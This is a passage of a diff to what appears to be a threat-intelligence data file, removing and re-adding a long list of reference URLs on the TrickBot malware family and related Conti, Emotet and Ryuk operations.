- "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf",
- "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/",
- "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf",
- "https://intel471.com/blog/privateloader-malware",
- "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/",
- "https://twitter.com/anthomsec/status/1321865315513520128",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
- "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056",
- "https://blog.cyberint.com/ryuk-crypto-ransomware",
- "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/",
- "https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/",
- "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot",
- "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html",
- "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607",
- "https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html",
- "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
- "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
- "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
- "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns",
- "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
- "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/",
- "https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/",
- "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization",
- "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://blog.vincss.net/2021/10/re025-trickbot-many-tricks.html",
- "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes",
- "https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html",
- "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://www.youtube.com/watch?v=lTywPmZEU1A",
- "https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/",
- "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
- "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
- "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/",
- "https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity",
- "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html",
- "https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://intel471.com/blog/conti-leaks-ransomware-development",
- "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
- "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html",
- "https://www.wired.co.uk/article/trickbot-malware-group-internal-messages",
- "https://www.justice.gov/opa/press-release/file/1445241/download",
- "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
- "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c",
- "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/",
- "https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/",
- "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/",
- "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
- "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
- "https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/",
- "https://www.intrinsec.com/deobfuscating-hunting-ostap/",
- "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez",
- "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/",
- "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
- "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
- "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
- "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
- "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/",
- "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/",
- "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms",
- "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/",
- "https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
- "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/",
- "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
- "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/",
- "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader",
- "https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/",
- "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works",
- "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
- 
"https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/", - "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", - "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://share.vx-underground.org/Conti/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", - "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html", - "https://www.youtube.com/watch?v=Brx4cygfmg8", - "https://duo.com/decipher/trickbot-up-to-its-old-tricks", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.netscout.com/blog/asert/dropping-anchor", - "https://twitter.com/VK_Intel/status/1328578336021483522", - "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", - 
"https://intel471.com/blog/a-brief-history-of-ta505", - "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/", - "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/", - "https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/", - "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/", - "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/", - "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/", "https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/" + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/", + "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://blog.talosintelligence.com/2020/03/trickbot-primer.html", + "https://www.secdata.com/the-trickbot-and-mikrotik/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", + "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/", + "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", + "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", + "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://osint.fans/service-nsw-russia-association", + "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/", + 
"https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "https://cofenselabs.com/all-you-need-is-text-second-wave/", + "https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/", + "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573", + "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://intel471.com/blog/conti-leaks-ransomware-development", + "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf", + "https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/", + "https://www.intrinsec.com/deobfuscating-hunting-ostap/", + "https://www.wired.com/story/trickbot-malware-group-internal-messages/", + "https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/", + "https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://community.riskiq.com/article/04ec92f4", + "https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/", + "https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/", + 
"https://www.justice.gov/opa/press-release/file/1445241/download", + "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html", + "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/", + "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/", + "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", + "https://www.secureworks.com/research/threat-profiles/gold-blackburn", + "https://duo.com/decipher/trickbot-up-to-its-old-tricks", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-076a", + "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", + "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", + "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/", + "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", + "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/", + "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", + 
"https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", + "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/", + "https://share.vx-underground.org/Conti/", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/", + "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/", + "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez", + "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", + "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/", + "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows", + "https://www.kryptoslogic.com/blog/2022/01/deep-dive-into-trickbots-web-injection/", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/", + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html", + "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", + "https://www.youtube.com/watch?v=EdchPEHnohw", + 
"https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/", + "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/", + "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", + "https://www.secureworks.com/research/threat-profiles/gold-ulrick", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/", + "https://home.treasury.gov/news/press-releases/jy1256", + "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", + "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/", + "http://www.malware-traffic-analysis.net/2018/02/01/", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", + "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", + "https://www.justice.gov/opa/pr/russian-national-extradited-united-states-face-charges-alleged-role-cybercriminal", + "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", + "https://thehackernews.com/2022/05/malware-analysis-trickbot.html", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", + "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/", + 
"https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/", + "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", + "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/", + "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", + "https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization", + "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://www.ic3.gov/Media/News/2022/220120.pdf", + "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", + "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles", + "https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/", + "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/", + "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/", + "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", + 
"https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://community.riskiq.com/article/298c9fc9", + "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/", + "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/", + "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/", + "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html", + "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html", + "https://unit42.paloaltonetworks.com/banking-trojan-techniques/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/", + "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/", + "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", + "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/", + "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", + 
"https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", + "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", + "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/", + "https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/", + "https://community.riskiq.com/article/111d6005/description", + "https://www.nisos.com/research/trickbot-trickleaks-data-analysis/", + "https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/", + "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/", + "https://labs.vipre.com/trickbots-tricks/", + "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf", + "https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/", + "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", + "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/", + "https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/", + "https://www.reuters.com/technology/details-another-big-ransomware-group-trickbot-leak-online-experts-say-2022-03-04/", + "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", + "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/", + 
"https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", + "https://redcanary.com/resources/webinars/deep-dive-process-injection/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://intel471.com/blog/privateloader-malware", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", + "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", + "https://www.youtube.com/watch?v=KMcSAlS9zGE", + "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", + "https://blog.vincss.net/2021/10/re025-trickbot-many-tricks.html", + "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/", + "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", + "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://securelist.com/trickbot-module-descriptions/104603/", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html", + "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", + 
"https://www.splunk.com/en_us/blog/security/detecting-trickbots.html", + "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", + "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/", + "https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "https://www.youtube.com/watch?v=Brx4cygfmg8", + "https://twitter.com/anthomsec/status/1321865315513520128", + "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf", + 
